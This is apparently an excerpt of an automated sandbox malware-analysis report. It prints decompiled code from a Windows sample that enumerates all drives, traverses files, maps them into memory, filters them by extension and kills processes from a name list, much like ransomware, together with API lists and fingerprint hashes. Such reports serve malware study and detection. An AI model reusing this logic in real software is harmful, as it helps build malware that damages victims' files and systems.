				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xf9df348; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F9D6DE0, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0F9D5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}










































                                        0x0f9d3e26
                                        0x0f9d3e38
                                        0x0f9d3e3c
                                        0x0f9d3e40
                                        0x0f9d3e4b
                                        0x0f9d3e4e
                                        0x0f9d3e50
                                        0x0f9d3e53
                                        0x0f9d3e58
                                        0x0f9d3e5c
                                        0x0f9d3e61
                                        0x0f9d3e6b
                                        0x0f9d3e6f
                                        0x0f9d3e76
                                        0x0f9d3e80
                                        0x0f9d3e84
                                        0x0f9d3e8a
                                        0x0f9d3e93
                                        0x0f9d3ea2
                                        0x0f9d3ea5
                                        0x0f9d3eb2
                                        0x0f9d3eb5
                                        0x0f9d3ebb
                                        0x0f9d3ec2
                                        0x0f9d3ecf
                                        0x0f9d3ed3
                                        0x0f9d3ed4
                                        0x0f9d3ed4
                                        0x0f9d3ed7
                                        0x0f9d3ed8
                                        0x0f9d3ee6
                                        0x0f9d3eea
                                        0x0f9d3eed
                                        0x0f9d3ef7
                                        0x0f9d3eff
                                        0x0f9d3f05
                                        0x0f9d3f0b
                                        0x0f9d3f11
                                        0x0f9d3f1b
                                        0x0f9d3f22
                                        0x0f9d3f26
                                        0x0f9d3f2a
                                        0x0f9d3f2c
                                        0x0f9d3f34
                                        0x0f9d3f3d
                                        0x0f9d3f9c
                                        0x0f9d3fa0
                                        0x0f9d3f3f
                                        0x0f9d3f3f
                                        0x0f9d3f42
                                        0x0f9d3f48
                                        0x0f9d3f4f
                                        0x0f9d3f50
                                        0x0f9d3f57
                                        0x0f9d3f5b
                                        0x0f9d3f60
                                        0x0f9d3f67
                                        0x0f9d3f6a
                                        0x0f9d3f6e
                                        0x0f9d3f78
                                        0x0f9d3f7a
                                        0x0f9d3f7e
                                        0x0f9d3f81
                                        0x0f9d3f84
                                        0x0f9d3f84
                                        0x0f9d3f84
                                        0x0f9d3f8a
                                        0x0f9d3f8e
                                        0x0f9d3f92
                                        0x0f9d3f96
                                        0x0f9d3f96
                                        0x0f9d3fa6
                                        0x0f9d3fca
                                        0x0f9d3fa8
                                        0x0f9d3fa8
                                        0x0f9d3fb2
                                        0x0f9d3fb6
                                        0x0f9d3fbd
                                        0x0f9d3fd4
                                        0x0f9d3fd8
                                        0x0f9d3ff6

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F9D3E40
                                        • GetTickCount.KERNEL32 ref: 0F9D3E65
                                        • GetDriveTypeW.KERNEL32(?), ref: 0F9D3E8A
                                        • CreateThread.KERNEL32 ref: 0F9D3EC9
                                        • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F9D3F0B
                                        • GetTickCount.KERNEL32 ref: 0F9D3F11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                        • String ID: ?:\
                                        • API String ID: 458387131-2533537817
                                        • Opcode ID: 3a4fa261f6d0bd4c2573b3026b0b23293ec2b0217c32a9afa2f6273347b0dd7d
                                        • Instruction ID: e9248d09911c0c3f7bf8714baa41f22062386ceb83a21cd3c161bb01fd57d192
                                        • Opcode Fuzzy Hash: 3a4fa261f6d0bd4c2573b3026b0b23293ec2b0217c32a9afa2f6273347b0dd7d
                                        • Instruction Fuzzy Hash: D05136709093009FD310CF18D888B5AFBE5FF89325F608A2DF58997391D375A954CB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6DE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47memorythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D6DE0(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0F9D6C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}











                                        0x0f9d6df9
                                        0x0f9d6dff
                                        0x0f9d6e0e
                                        0x0f9d6e1c
                                        0x0f9d6e30
                                        0x0f9d6e38
                                        0x0f9d6e40
                                        0x0f9d6e48
                                        0x0f9d6e56
                                        0x0f9d6e6b
                                        0x0f9d6e7b
                                        0x0f9d6e83

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F9D6DF9
                                        • wsprintfW.USER32 ref: 0F9D6E0E
                                        • InitializeCriticalSection.KERNEL32(?), ref: 0F9D6E1C
                                        • VirtualAlloc.KERNEL32 ref: 0F9D6E50
                                          • Part of subcall function 0F9D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                          • Part of subcall function 0F9D6C90: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                          • Part of subcall function 0F9D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F9D6E7B
                                        • ExitThread.KERNEL32 ref: 0F9D6E83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                        • String ID: %c:\
                                        • API String ID: 1988002015-3142399695
                                        • Opcode ID: 2ee79f82eab171010b92a82065b94d47a2caada3147338485a49379818dd1f3f
                                        • Instruction ID: cd403c33321bfe05b1f8e858b5b953a9e64edd3393160eb5cd269fb2108d0eea
                                        • Opcode Fuzzy Hash: 2ee79f82eab171010b92a82065b94d47a2caada3147338485a49379818dd1f3f
                                        • Instruction Fuzzy Hash: 5101C4B5148300BBE3209F24CC8AF163BACAB45B21F204604FB659A1C2D7B89564CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2890 Relevance: 12.1, APIs: 8, Instructions: 90fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E0F9D2890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0F9D3030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0F9D3030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0F9D3030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0F9D82A0(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0F9D2830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}


















                                        0x0f9d2890
                                        0x0f9d2899
                                        0x0f9d289b
                                        0x0f9d28b1
                                        0x0f9d28b6
                                        0x0f9d28f9
                                        0x0f9d2901
                                        0x0f9d28b8
                                        0x0f9d28c0
                                        0x0f9d28c3
                                        0x0f9d28ca
                                        0x0f9d28cf
                                        0x0f9d28d0
                                        0x0f9d28d8
                                        0x0f9d28e5
                                        0x0f9d28eb
                                        0x0f9d28f0
                                        0x0f9d2910
                                        0x0f9d2914
                                        0x0f9d2916
                                        0x0f9d291d
                                        0x0f9d291f
                                        0x0f9d2920
                                        0x0f9d2920
                                        0x0f9d2923
                                        0x0f9d2926
                                        0x0f9d292b
                                        0x0f9d292b
                                        0x0f9d292e
                                        0x0f9d293f
                                        0x0f9d2942
                                        0x0f9d2942
                                        0x0f9d2951
                                        0x0f9d2954
                                        0x0f9d295e
                                        0x0f9d28f2
                                        0x0f9d28f3
                                        0x00000000
                                        0x0f9d28f3
                                        0x0f9d28f0

                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0F9D2C02), ref: 0F9D28AB
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,0F9D2C02), ref: 0F9D28BA
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F9D2C02), ref: 0F9D28E5
                                        • CloseHandle.KERNEL32(00000000,?,?,0F9D2C02), ref: 0F9D28F3
                                        • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0F9D2C02), ref: 0F9D290A
                                        • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F9D2C02), ref: 0F9D2942
                                        • CloseHandle.KERNEL32(?,?,?,0F9D2C02), ref: 0F9D2951
                                        • CloseHandle.KERNEL32(00000000,?,?,0F9D2C02), ref: 0F9D2954
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                        • String ID:
                                        • API String ID: 265113797-0
                                        • Opcode ID: 8e576b455ec9157ecf32e980671fc580164067d028ea1d5d72608e5930a0fb66
                                        • Instruction ID: 822f489a2f8fbf4dac1b4ed45c13d4a9ab873360c6d5d64cc8e4a0219f41615f
                                        • Opcode Fuzzy Hash: 8e576b455ec9157ecf32e980671fc580164067d028ea1d5d72608e5930a0fb66
                                        • Instruction Fuzzy Hash: BE213871A012197FE3206BB49C85F7F776CDB85676F308224FD01E32C2E6389C2149A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0F9D6850(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xf9e2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xf9e2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}















                                        0x0f9d6853
                                        0x0f9d685c
                                        0x0f9d685e
                                        0x0f9d6872
                                        0x0f9d6877
                                        0x0f9d687c
                                        0x0f9d6890
                                        0x0f9d689a
                                        0x0f9d6880
                                        0x0f9d6880
                                        0x0f9d6886
                                        0x0f9d6889
                                        0x0f9d688a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d688a
                                        0x0f9d688e
                                        0x0f9d68b7
                                        0x0f9d68bf
                                        0x0f9d68c5
                                        0x0f9d68cb
                                        0x0f9d68d0
                                        0x0f9d68d6
                                        0x0f9d6922
                                        0x0f9d6929
                                        0x0f9d692c
                                        0x0f9d68d8
                                        0x0f9d68d8
                                        0x0f9d68de
                                        0x0f9d68e2
                                        0x0f9d68e4
                                        0x0f9d68e4
                                        0x0f9d68e9
                                        0x0f9d6909
                                        0x0f9d690d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d68eb
                                        0x0f9d68f0
                                        0x0f9d68f0
                                        0x0f9d68f6
                                        0x00000000
                                        0x00000000
                                        0x0f9d68fc
                                        0x0f9d68fe
                                        0x00000000
                                        0x0f9d6900
                                        0x0f9d6900
                                        0x0f9d6907
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d6907
                                        0x00000000
                                        0x0f9d68fe
                                        0x0f9d6920
                                        0x0f9d6920
                                        0x00000000
                                        0x0f9d6920
                                        0x00000000
                                        0x0f9d690f
                                        0x0f9d690f
                                        0x0f9d6913
                                        0x0f9d6916
                                        0x0f9d6919
                                        0x0f9d691e
                                        0x0f9d68de
                                        0x0f9d692f
                                        0x0f9d6937
                                        0x0f9d6946
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d688e
                                        0x0f9d6860
                                        0x0f9d6869
                                        0x0f9d6869

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F9D698A), ref: 0F9D6872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: %s
                                        • API String ID: 1659193697-4273690596
                                        • Opcode ID: 8e67ce7481fd142d2bff3df60002288fecb908c5082f09d326806e134051fad0
                                        • Instruction ID: 220044b21a863b118e7884348ec18289af32a7bd8d70384166d6060dd4a1cb93
                                        • Opcode Fuzzy Hash: 8e67ce7481fd142d2bff3df60002288fecb908c5082f09d326806e134051fad0
                                        • Instruction Fuzzy Hash: CA212772A0122897E7385F2CAC003F673ECEF84325FA5C126FE459B1C2E7B569908290
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4C40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51processCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0F9D4C40(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0F9D9010( &_v92, 0, 0x44);
				_t15 =  *0xf9e2a6c; // 0x49c
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xf9e2a68; // 0x4a4
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}








                                        0x0f9d4c4c
                                        0x0f9d4c52
                                        0x0f9d4c54
                                        0x0f9d4c59
                                        0x0f9d4c5e
                                        0x0f9d4c66
                                        0x0f9d4c69
                                        0x0f9d4c6c
                                        0x0f9d4c71
                                        0x0f9d4c78
                                        0x0f9d4c7d
                                        0x0f9d4c88
                                        0x0f9d4ca7
                                        0x0f9d4cbd
                                        0x0f9d4cc8
                                        0x0f9d4ca9
                                        0x0f9d4cb3
                                        0x0f9d4cb3

                                        APIs
                                        • _memset.LIBCMT ref: 0F9D4C59
                                        • CreateProcessW.KERNEL32 ref: 0F9D4C9F
                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0F9D4CA9
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F9D4CBD
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F9D4CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateErrorLastProcess_memset
                                        • String ID: D
                                        • API String ID: 1393943095-2746444292
                                        • Opcode ID: fb0a166359b1416d4cc49898cf0cff4c8ea6a83f5a795235605d8265b9e872d3
                                        • Instruction ID: d5c176166556a1cec192e4fde72d849ed3edbaa42d9fd8a2de9c06f5343fc7d6
                                        • Opcode Fuzzy Hash: fb0a166359b1416d4cc49898cf0cff4c8ea6a83f5a795235605d8265b9e872d3
                                        • Instruction Fuzzy Hash: 2F016171E44318ABEB20DBA4DC05BDE7BB8EF04715F204126F608FA180E7B525648B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D48A8 Relevance: 10.5, APIs: 7, Instructions: 46stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D48A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000);
					}
					return CloseHandle(_t24);
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}











                                        0x0f9d48a8
                                        0x0f9d48a8
                                        0x0f9d48b0
                                        0x0f9d48b0
                                        0x0f9d48b5
                                        0x0f9d48bd
                                        0x0f9d48cb
                                        0x0f9d48cf
                                        0x0f9d48d4
                                        0x0f9d48e1
                                        0x0f9d48e1
                                        0x0f9d48cf
                                        0x0f9d48eb
                                        0x0f9d48ec
                                        0x0f9d48ec
                                        0x0f9d48f2
                                        0x00000000
                                        0x00000000
                                        0x0f9d48f4
                                        0x0f9d48f4
                                        0x0f9d48fa
                                        0x0f9d4900
                                        0x0f9d4900
                                        0x0f9d4905
                                        0x0f9d48a4
                                        0x0f9d48b0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d48b0
                                        0x0f9d4909
                                        0x0f9d4913
                                        0x0f9d4913
                                        0x0f9d4922
                                        0x0f9d48b0
                                        0x0f9d48b5
                                        0x0f9d48bd
                                        0x0f9d48cb
                                        0x0f9d48cf
                                        0x0f9d48d4
                                        0x0f9d48e1
                                        0x0f9d48e1
                                        0x0f9d48cf
                                        0x0f9d48eb
                                        0x0f9d48ec
                                        0x0f9d48ec
                                        0x0f9d48ef

                                        APIs
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F9D48B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F9D48C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F9D48D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D48E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0F9D48FA
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4913
                                        • CloseHandle.KERNEL32(?), ref: 0F9D491A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
                                        • String ID:
                                        • API String ID: 999196985-0
                                        • Opcode ID: 29c2c596a43e13983be63ca31ab453c9e7a51d9deeea4ad92d9bd36f1549700a
                                        • Instruction ID: 0c13e90c3f37b1b6ccbedb493f378c29d98aa27ca2bf31660fff7f38523b81a4
                                        • Opcode Fuzzy Hash: 29c2c596a43e13983be63ca31ab453c9e7a51d9deeea4ad92d9bd36f1549700a
                                        • Instruction Fuzzy Hash: B3012D36205101AFE7259F65EC48BAA736CEF85762F304034FE0997083DB75E8648FA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3AA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43memorylibraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E0F9D3AA0() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
